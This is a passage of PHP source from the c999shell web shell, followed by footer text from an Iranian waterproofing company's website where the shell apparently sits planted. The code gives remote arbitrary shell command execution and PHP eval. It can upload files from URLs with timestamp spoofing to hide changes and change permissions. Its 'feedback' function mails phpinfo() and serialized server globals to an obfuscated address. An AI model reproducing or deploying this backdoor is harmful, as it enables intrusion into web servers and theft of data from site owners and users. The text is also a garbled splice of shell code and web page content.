 $arr_copy = $sess_data["copy"];
 $arr_cut = $sess_data["cut"];
 $arr = array_merge($arr_copy,$arr_cut);
 if (count($arr) == 0) {echo "
Buffer is empty!
";}
 else {echo "File-System buffer

"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
}
if ($act == "selfremove")
{
 if (($submit == $rndcode) and ($submit != ""))
 {
  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c999shell v.".$shver."!"; c999shexit(); }
  else {echo "
Can't delete ".__FILE__."!
";}
 }
 else
 {
  if (!empty($rndcode)) {echo "Error: incorrect confimation!";}
  $rnd = rand(0,9).rand(0,9).rand(0,9);
  echo "
Self-remove: ".__FILE__."
Are you sure?
For confirmation, enter \"".$rnd."\"
 ";
 }
}
if ($act == "update") {$ret = c999sh_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "

";}}
if ($act == "feedback")
{
 $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1");
 if (!empty($submit))
 {
  $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
  $body = "c999shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
  if (!empty($fdbk_ref))
  {
   $tmp = @ob_get_contents();
   ob_clean();
   phpinfo();
   $phpinfo = base64_encode(ob_get_contents());
   ob_clean();
   echo $tmp;
   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
  }
  mail($suppmail,"c999shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
  echo "
Thanks for your feedback! Your ticket ID: ".$ticket.".
";
 }
 else {echo " Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

Your name:

Your e-mail:

Message:


Attach server-info *

There are no checking in the form.

* - strongly recommended, if you report bug, because we need it for bug-fix.

We understand languages: English, Russian.

";}
}
if ($act == "search")
{
 echo "Search in file-system:
";
 if (empty($search_in)) {$search_in = $d;}
 if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
 if (empty($search_text_wwo)) {$search_text_regexp = 0;}
 if (!empty($submit))
 {
  $found = array();
  $found_d = 0;
  $found_f = 0;
  $search_i_f = 0;
  $search_i_d = 0;
  $a = array
  (
   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
   "text_wwo"=>$search_text_wwo,
   "text_cs"=>$search_text_cs,
   "text_not"=>$search_text_not
  );
  $searchtime = getmicrotime();
  $in = array_unique(explode(";",$search_in));
  foreach($in as $v) {c999fsearch($v);}
  $searchtime = round(getmicrotime()-$searchtime,4);
  if (count($found) == 0) {echo "No files found!";}
  else
  {
   $ls_arr = $found;
   $disp_fullpath = TRUE;
   $act = "ls";
  }
 }
 echo "

Search for (file/folder name):   - regexp

Search in (explode \";\"):


Text:- regexp
   - whole words only
   - case sensitive
   - find files NOT containing the text


";
 if ($act == "ls") {$dspact = $act; echo "
Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

";}
}
if ($act == "chmod")
{
 $mode = fileperms($d.$f);
 if (!$mode) {echo "Change file-mode with error: can't get current value.";}
 else
 {
  $form = TRUE;
  if ($chmod_submit)
  {
   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
   else {$err = "Can't chmod to ".$octet.".";}
  }
  if ($form)
  {
   $perms = parse_perms($mode);
   echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
".($err?"Error: ".$err:"")."
Owner

 Read
 Write
eXecute
Group

 Read
 Write
eXecute
World

 Read
 Write
eXecute
";
  }
 }
}
if ($act == "upload")
{
 $uploadmess = "";
 $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
 if (empty($uploadpath)) {$uploadpath = $d;}
 elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
 if (!empty($submit))
 {
  global $HTTP_POST_FILES;
  $uploadfile = $HTTP_POST_FILES["uploadfile"];
  if (!empty($uploadfile["tmp_name"]))
  {
   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
   else {$destin = $userfilename;}
   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
";}
  }
  elseif (!empty($uploadurl))
  {
   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
   else
   {
    $destin = explode("/",$destin);
    $destin = $destin[count($destin)-1];
    if (empty($destin))
    {
     $i = 0;
     $b = "";
     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
   }
   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
";}
   else
   {
    $st = getmicrotime();
    $content = @file_get_contents($uploadurl);
    $dt = round(getmicrotime()-$st,4);
    if (!$content) {$uploadmess .=  "Can't download file!
";}
    else
    {
     if ($filestealth) {$stat = stat($uploadpath.$destin);}
     $fp = fopen($uploadpath.$destin,"w");
     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
";}
     else
     {
      fwrite($fp,$content,strlen($content));
      fclose($fp);
      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
     }
    }
   }
  }
 }
 if ($miniform)
 {
  echo "".$uploadmess."";
  $act = "ls";
 }
 else
 {
  echo "File upload:
".$uploadmess."

Select file on your local computer:
               or

Input URL:


Save this file dir:


File-name (auto-fill):


 convert file name to lovercase


";
 }
}
if ($act == "delete")
{
 $delerr = "";
 foreach ($actbox as $v)
 {
  $result = FALSE;
  $result = fs_rmobj($v);
  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
";}
 }
 if (!empty($delerr)) {echo "Deleting with errors:
".$delerr;}
 $act = "ls";
}
if (!$usefsbuff)
{
 if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.
";}
}
else
{
 if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c999_sess_put($sess_data); $act = "ls"; }
 elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c999_sess_put($sess_data); $act = "ls";}
 elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c999_sess_put($sess_data); $act = "ls";}
 if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c999_sess_put($sess_data);}
 elseif ($actpastebuff)
 {
  $psterr = "";
  foreach($sess_data["copy"] as $k=>$v)
  {
   $to = $d.basename($v);
   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
";}
   if ($copy_unset) {unset($sess_data["copy"][$k]);}
  }
  foreach($sess_data["cut"] as $k=>$v)
  {
   $to = $d.basename($v);
   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
";}
   unset($sess_data["cut"][$k]);
  }
  c999_sess_put($sess_data);
  if (!empty($psterr)) {echo "Pasting with errors:
".$psterr;}
  $act = "ls";
 }
 elseif ($actarcbuff)
 {
  $arcerr = "";
  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
  else {$ext = ".tar.gz";}
  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
  $cmdline .= " ".$actarcbuff_path;
  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
  foreach($objects as $v)
  {
   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
   if (is_dir($v))
   {
    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
    $v .= "*";
   }
   $cmdline .= " ".$v;
  }
  $tmp = realpath(".");
  chdir($d);
  $ret = myshellexec($cmdline);
  chdir($tmp);
  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
";}
  $ret = str_replace("\r\n","\n",$ret);
  $ret = explode("\n",$ret);
  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
  foreach($sess_data["cut"] as $k=>$v)
  {
   if (in_array($v,$ret)) {fs_rmobj($v);}
   unset($sess_data["cut"][$k]);
  }
  c999_sess_put($sess_data);
  if (!empty($arcerr)) {echo "Archivation errors:
".$arcerr;}
  $act = "ls";
 }
 elseif ($actpastebuff)
 {
  $psterr = "";
  foreach($sess_data["copy"] as $k=>$v)
  {
   $to = $d.basename($v);
   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
";}
   if ($copy_unset) {unset($sess_data["copy"][$k]);}
  }
  foreach($sess_data["cut"] as $k=>$v)
  {
   $to = $d.basename($v);
   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
";}
   unset($sess_data["cut"][$k]);
  }
  c999_sess_put($sess_data);
  if (!empty($psterr)) {echo "Pasting with errors:
".$psterr;}
  $act = "ls";
 }
}
if ($act == "cmd")
{
if (trim($cmd) == "ps -aux") {$act = "processes";}
elseif (trim($cmd) == "tasklist") {$act = "processes";}
else
{
 @chdir($chdir);
 if (!empty($submit))
 {
  echo "Result of execution this command:
";
  $olddir = realpath(".");
  @chdir($d);
  $ret = myshellexec($cmd);
  $ret = convert_cyr_string($ret,"d","w");
  if ($cmd_txt)
  {
   $rows = count(explode("\r\n",$ret))+1;
   if ($rows < 10) {$rows = 10;}
   echo "
";
  }
  else {echo $ret."
";}
  @chdir($olddir);
 }
 else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
 echo "


 Display in text-area 
";
}
}
if ($act == "ls")
{
 if (count($ls_arr) > 0) {$list = $ls_arr;}
 else
 {
  $list = array();
  if ($h = @opendir($d))
  {
   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
   closedir($h);
  }
  else {}
 }
 if (count($list) == 0) {echo "
Can't open folder (".htmlspecialchars($d).")!
";}
 else
 {
  //Building array
  $objects = array();
  $vd = "f"; //Viewing mode
  if ($vd == "f")
  {
   $objects["head"] = array();
   $objects["folders"] = array();
   $objects["links"] = array();
   $objects["files"] = array();
   foreach ($list as $v)
   {
    $o = basename($v);
    $row = array();
    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
    elseif (is_dir($v))
    {
     if (is_link($v)) {$type = "LINK";}
     else {$type = "DIR";}
     $row[] = $v;
     $row[] = $type;
    }
    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
    $row[] = filemtime($v);
    if (!$win)
    {
     $ow = posix_getpwuid(fileowner($v));
     $gr = posix_getgrgid(filegroup($v));
     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
    }
    $row[] = fileperms($v);
    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
    elseif (is_link($v)) {$objects["links"][] = $row;}
    elseif (is_dir($v)) {$objects["folders"][] = $row;}
    elseif (is_file($v)) {$objects["files"][] = $row;}
    $i++;
   }
   $row = array();
   $row[] = "Name";
   $row[] = "Size";
   $row[] = "Modify";
   if (!$win)
  {$row[] = "Owner/Group";}
   $row[] = "Perms";
   $row[] = "Action";
   $parsesort = parsesort($sort);
   $sort = $parsesort[0].$parsesort[1];
   $k = $parsesort[0];
   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
   $y = "";
   $y .= "\"".($parsesort[1]
";
   $row[$k] .= $y;
   for($i=0;$i
";
  foreach($tab as $i=>$k)
  {
   echo "";
   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "";}
   echo "";
  }
  echo "
".$v."
";
 }
}
if ($act == "eval")
{
 if (!empty($eval))
 {
  echo "Result of execution this PHP-code:
";
  $tmp = ob_get_contents();
  $olddir = realpath(".");
  @chdir($d);
  if ($tmp)
  {
   ob_clean();
   eval($eval);
   $ret = ob_get_contents();
   $ret = convert_cyr_string($ret,"d","w");
   ob_clean();
   echo $tmp;
   if ($eval_txt)
   {
    $rows = count(explode("\r\n",$ret))+1;
    if ($rows < 10) {$rows = 10;}
    echo "
";
   }
   else {echo $ret."
";}
  }
  else
  {
   if ($eval_txt)
   {
    echo "
";
   }
   else {echo $ret;}
  }
  @chdir($olddir);
 }
 else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
 echo "


 Display in text-area 
";
}
if ($act == "f")
{
 if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
 {
  if (file_exists($d.$f)) {echo "
Permision denied (".htmlspecialchars($d.$f).")!
";}
  else {echo "
File does not exists (".htmlspecialchars($d.$f).")!
Create
";}
 }
 else
 {
  $r = @file_get_contents($d.$f);
  $ext = explode(".",$f);
  $c = count($ext)-1;
  $ext = $ext[$c];
  $ext = strtolower($ext);
  $rft = "";
  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
  if (empty($ft)) {$ft = $rft;}
  $arr = array(
   array("","info"),
   array("","html"),
   array("","txt"),
   array("Code","code"),
   array("Session","phpsess"),
   array("","exe"),
   array("SDB","sdb"),
   array("","img"),
   array("","ini"),
   array("","download"),
   array("","notepad"),
   array("","edit")
  );
  echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
Select action/file-type:
";
  foreach($arr as $t)
  {
   if ($t[1] == $rft) {echo " ".$t[0]."";}
   elseif ($t[1] == $ft) {echo " ".$t[0]."";}
   else {echo " ".$t[0]."";}
   echo " (+) |";
  }
  echo "
";
  if ($ft == "info")
  {
   echo "Information:";
   if (!$win)
   {
    echo "
Path ".$d.$f."
Size ".view_size(filesize($d.$f))."
MD5 ".md5_file($d.$f)."
Owner/Group ";   
    $ow = posix_getpwuid(fileowner($d.$f));
    $gr = posix_getgrgid(filegroup($d.$f));
    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
   }
   echo "
Perms ".view_perms_color($d.$f)."
Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

";
   $fi = fopen($d.$f,"rb");
   if ($fi)
   {
    if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));}
    else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
    $n = 0;
    $a0 = "00000000
";
    $a1 = "";
    $a2 = "";
    for ($i=0; $i

 
افتخارات
استاندارد ملی ایراناستاندارد مدیریت کیفیت ISO 9001:2008استاندارد مدیریت زیست محیطی اروپاواحد نمونه صنعتیتائیدیه مرکز تحقیقات ساختمان و مسکنبرند منتخب جشنواره برندهاواحد برگزیده ملی استانی استاندارداستاندارد CE اروپا
ورود و خروج

بازیافت رمز عبور
ثبت نام کاربر جدید
نظرسنجی سایت
این سایت را چگونه ارزیابی می کنید؟
 
 
 
 
 © 2009 Shahr Bam Ayegh Waterproofing company.
 All rights reserved.
آدرس کارخانه و دفتر مرکزی: خوی، شهرک صنعتی خوی، بلوار صنعتگران 2.
تلفن: +98(0)4613524270 +98(0)4613524343       فاکس: +98(0)4613524269
ایمیل : info@shahrbam.com وب سایت : http://www.shahrbam.com